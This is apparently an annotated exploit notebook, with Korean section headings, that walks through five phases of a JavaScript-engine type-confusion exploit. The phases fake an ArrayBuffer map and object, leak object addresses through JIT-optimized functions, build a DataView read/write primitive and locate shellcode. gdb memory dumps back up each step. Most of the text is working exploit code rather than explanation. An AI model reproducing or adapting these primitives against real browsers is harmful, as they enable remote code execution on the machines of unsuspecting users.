ab_map_obj 생성
phase 1 : set ab_map_obj[]
ab.__proto__를 구해서 ab_map_obj에 넣는다
//alert_log(addr);
var nop = 0xdaba0000; // filler value for the slots that are not given a meaning here
// 12 x 32-bit slots; indices 6..9 are placeholders that are overwritten further down
// (ab_map_obj[0x6..0x9]) with the halves of ab_proto_addr and ab_constructor_addr.
var ab_map_obj = [
nop,nop,
0x1f000008,0x000900c0,0x082003ff,0x0,
nop,nop, // indices 6,7: replaced below with the low/high halves of ab_proto_addr
nop,nop,0x0,0x0 // indices 8,9: replaced below with the low/high halves of ab_constructor_addr
]
// read_obj_addr and ab are defined outside this excerpt. Both assignments below
// create implicit globals (no var/let).
ab_proto_addr = read_obj_addr(ab.__proto__);
ab_constructor_addr = ab_proto_addr - 0x70; // fixed offset from the prototype address; build-specific, not derived here
alert_log("[.] 1.ab_prot_addr: 0x" + ab_proto_addr.toString(16));
//sleep(60*1000);
// Split each 64-bit value into a low and a high 32-bit half at indices 6..9.
// NOTE(review): `& 0xffffffff` yields a signed int32 (negative when bit 31 is set), and
// `/ 0x100000000` keeps a fractional part whenever the low half is nonzero, unlike a shift;
// presumably change_to_float tolerates both — confirm.
ab_map_obj[0x6] = ab_proto_addr & 0xffffffff;
ab_map_obj[0x7] = ab_proto_addr / 0x100000000;
ab_map_obj[0x8] = ab_constructor_addr & 0xffffffff;
ab_map_obj[0x9] = ab_constructor_addr / 0x100000000;
0x26e976fd3f78: 0xdaba0000daba0000 0x000900c01f000008
0x26e976fd3f88: 0x00000000082003ff 0x000026e976f95889
0x26e976fd3f98: 0x000026e976f95819 0x0000000000000000
phase 2 : ab_map_obj의 주소 찾기
gdb에서 0x000900c01f000008 값이 찾아져야 함
// change_to_float, ab_map_obj_float and read_obj_addr2 are defined outside this excerpt.
// The +0x40 is a fixed, target-specific adjustment; its meaning is not shown here.
// ab_map_obj_addr becomes an implicit global (no var/let; no trailing semicolon).
change_to_float(ab_map_obj,ab_map_obj_float);
ab_map_obj_addr = read_obj_addr2(ab_map_obj_float) + 0x40
gdb-peda$ find 0x000900c01f000008
Searching for '0x000900c01f000008' in: None ranges
Found 1 results, display max 1 items:
mapped : 0x26e976fd3f80 --> 0x900c01f000008
phase 3 : fake_ab의 주소 찾기
// NOTE(review): fake_ab is used on the next two lines before its `var` declaration below;
// with hoisting it is still undefined at that point, so this excerpt looks out of order —
// confirm the statement order against the original file.
change_to_float(fake_ab,fake_ab_float);
fake_ab_float_addr = read_obj_addr3(fake_ab_float) + 0x40; // read_obj_addr3, fake_ab_float defined elsewhere; implicit global
// 12 x 32-bit slots: ab_map_obj_addr split into low/high halves, repeated three times,
// followed by the constants annotated inline.
var fake_ab = [
ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
0x0,0x4000, /* buffer length; matches the DataView length used in phase 4 */
0x12345678,0x123,/* buffer address (placeholder values) */
0x4,0x0
]
phase 4 : fake_arraybuffer 오브젝트 만들기
// double_arr42 and d2u are defined outside this excerpt; all three names below are implicit globals.
fake_arraybuffer = double_arr42[1];
fake_dv = new DataView(fake_arraybuffer,0,0x4000); // length 0x4000 matches the "buffer length" slot in fake_ab
// d2u is called with (high half, low half); the result is stringified so it can be
// spliced into the function source built by the eval below.
fake_ab_float_addr_f = d2u(fake_ab_float_addr / 0x100000000,fake_ab_float_addr & 0xffffffff).toString();
// Reads element 0 of every entry in arr into the implicit global ttt; the value is not used here.
// Assumes every entry is indexable (throws on null/undefined entries).
function carry_me_plz_fake(arr){
for(var i = 0;i < arr.length;i++){
var o = arr[i];
ttt = o[0]; // implicit global
}
}
// eval defines sorry_fake with fake_ab_float_addr_f baked in as a numeric literal.
// The interpolated value is a number computed above, not external input, so this is not an
// injection surface; a closure over the value would avoid eval, but the literal form is
// evidently intentional. valueOf4 and array4 are defined outside this excerpt.
eval('function sorry_fake(){1 + valueOf4;double_arr42[0] = 1.1;carry_me_plz_fake(array4);double_arr42[1] = '+fake_ab_float_addr_f+';}')
// 0x1000 calls of each function before flag is set; what flag gates is defined outside this excerpt.
for(var i = 0;i < 0x1000;i++){
carry_me_plz_fake(array3);
}
for(var i = 0;i < 0x1000;i++){
sorry_fake();
}
flag = 1; // implicit global
sorry_fake();
//sleep(60)
fake_arraybuffer = double_arr42[1]; // re-read after the final call
phase 5 : shellcode 주소 찾기
// Returns u2d(double_arr52[0]) as read after the final sorry() call.
// valueOf5, double_arr52, array5, flag and u2d are all defined outside this excerpt.
function read_obj_addr5(object){
// Writes obj into element 0 of every entry of arr.
function carry_me_plz(arr,obj){
for(var i = 0;i < arr.length;i++){
var o = arr[i];
o[0] = obj;
}
}
// Evaluates 1 + valueOf5 and discards the result (presumably for a side effect of
// evaluating valueOf5 — confirm), writes 1.1 to double_arr52[0], stores `object`
// through carry_me_plz, then returns double_arr52[0].
function sorry(){
1 + valueOf5;
double_arr52[0] = 1.1;
carry_me_plz(array5,object);
return double_arr52[0];
}
// 0x1000 calls of each before flag is set (flag's effect is defined elsewhere).
for(var i = 0;i < 0x1000;i++){
carry_me_plz(array5,object);
}
for(var i = 0;i < 0x1000;i++){
sorry();
}
flag = 1; // implicit global
re = u2d(sorry()); // implicit global
return re;
}